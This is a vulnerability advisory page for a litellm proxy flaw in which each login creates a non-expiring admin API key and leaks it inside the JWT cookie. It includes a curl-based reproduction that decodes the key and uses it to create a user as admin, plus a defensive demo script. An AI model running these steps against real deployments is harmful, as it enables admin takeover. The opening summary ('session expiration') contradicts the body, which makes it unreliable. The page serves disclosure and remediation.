BerriAI litellm PROXY_ADMIN database API Key Generator login_utils.py authenticate_user session expiration
Description
A security flaw has been discovered in BerriAI litellm up to 1.82.2. This impacts the function authenticate_user of the file litellm/proxy/auth/login_utils.py of the component PROXY_ADMIN database API Key Generator. Performing a manipulation results in session expiration. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches
Vulnerability mechanics
Root cause
"The `generate_key_helper_fn()` call was not removed from the login flow during the JWT migration, causing every `/login` request to create a permanent PROXY_ADMIN database API key that is leaked inside the JWT payload and never expired."
Attack vector
An attacker who can intercept a login JWT cookie (e.g., through XSS, network sniffing, or log exposure) can decode the JWT without any secret because the payload is only base64-encoded. The extracted `sk-...` key is a standalone PROXY_ADMIN bearer token that remains valid for 12 hours independent of the JWT session. Because each login creates a new key without expiring previous ones, an attacker can accumulate multiple valid admin tokens and use them to perform any admin action, such as creating new users [ref_id=1].
Affected code
The flaw resides in `litellm/proxy/auth/login_utils.py` within the `authenticate_user()` function. Both the admin login path (line 177) and the user login path (line 265) call `generate_key_helper_fn()` to create a permanent PROXY_ADMIN database API key on every login. The resulting key is then embedded in the JWT cookie payload at lines 332-334 via `key=login_result.key`. The same pattern exists in the `/onboarding/get_token` endpoint in `proxy_server.py` (line 11159).
What the fix does
The advisory does not include a published patch. The recommended fix is to remove the `generate_key_helper_fn()` call from the login flow so that no permanent database API key is created during authentication, and to restore the `expire_previous_ui_session_tokens` function that was removed during the JWT migration. Without these changes, every login continues to leak a permanent admin key inside the JWT and never expires prior keys [ref_id=1].
Preconditions
- config: The target must be a LiteLLM deployment with a PostgreSQL database (DATABASE_URL set).
- network: The attacker must be able to intercept a login JWT cookie (e.g., via XSS, network sniffing, or log exposure).
- auth: No authentication is required beyond obtaining the JWT cookie from a legitimate login.
Reproduction
1. Login and capture the JWT cookie:

```bash
TOKEN=$(curl -s -D - -X POST http://localhost:4000/login \
  -d "username=admin&password=sk-1234" \
  -o /dev/null 2>&1 | grep -oP 'token=\K[^;]+')
```

2. Decode the JWT and extract the embedded DB key:

```bash
DB_KEY=$(echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | \
  python3 -c "import sys,json; print(json.load(sys.stdin)['key'])")
echo "Extracted admin DB key: $DB_KEY"
```

3. Use the extracted key as a standalone admin API key:

```bash
curl -X POST http://localhost:4000/user/new \
  -H "Authorization: Bearer $DB_KEY" \
  -H "Content-Type: application/json" \
  -d '{"user_email": "attacker@evil.com"}'
```

Returns HTTP 200 — full admin access. [ref_id=1]
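As an added illustration of the mechanics in the "Attack vector", "What the fix does" and "Reproduction" sections (demo code written for this page, not litellm's own), the block below models the buggy login flow beside a remediated one and gives the audit check a defender can run on a captured cookie to tell whether its payload carries a standalone `sk-` key. The signing secret, the in-memory key and session tables, and the 12-hour session lifetime are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

JWT_SECRET = b"demo-signing-secret"  # constructed; a real proxy uses its own secret
DB_KEYS: dict = {}   # stand-in for the proxy's API key table (hypothetical)
SESSIONS: dict = {}  # stand-in for the UI session table (hypothetical)

def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def make_jwt(claims: dict) -> str:
    """Minimal HS256 JWT. The signature protects integrity only; the payload is readable."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(JWT_SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"

def decode_payload_unverified(token: str) -> dict:
    """Read the middle segment without the secret; restore the '=' padding JWTs strip."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))

def leaked_db_key(token: str):
    """Audit check on a captured login cookie: the embedded 'sk-' key, or None if absent."""
    key = decode_payload_unverified(token).get("key")
    return key if isinstance(key, str) and key.startswith("sk-") else None

def vulnerable_login(user: str) -> str:
    """Mirrors the bug: every login mints a permanent PROXY_ADMIN DB key and embeds it."""
    key = "sk-" + secrets.token_hex(8)
    DB_KEYS[key] = {"user": user, "role": "proxy_admin", "expires": None}
    return make_jwt({"sub": user, "key": key})

def fixed_login(user: str) -> str:
    """Remediated flow: expire the user's earlier UI sessions, embed identity only."""
    now = time.time()
    for session in SESSIONS.values():
        if session["user"] == user:
            session["expires"] = now
    sid = secrets.token_hex(8)
    SESSIONS[sid] = {"user": user, "expires": now + 12 * 3600}  # assumed 12h lifetime
    return make_jwt({"sub": user, "sid": sid})

def active_sessions(user: str) -> int:
    return sum(1 for s in SESSIONS.values() if s["user"] == user and s["expires"] > time.time())
```

Running `leaked_db_key` over cookies issued by a real deployment is a quick way to confirm whether it is still on an affected build; a non-None result means the cookie carries a bearer token that outlives the session.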
Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- gist.github.com/YLChen-007/39ed709ce322431658a05b951e91f278 (mitre: exploit)
- vuldb.com/cve/CVE-2026-12772 (mitre: third-party-advisory)
- vuldb.com/submit/811281 (mitre: third-party-advisory)
- vuldb.com/vuln/372514 (mitre: vdb-entry, technical-description)
- vuldb.com/vuln/372514/cti (mitre: signature, permissions-required)
News mentions
No linked articles in our index yet.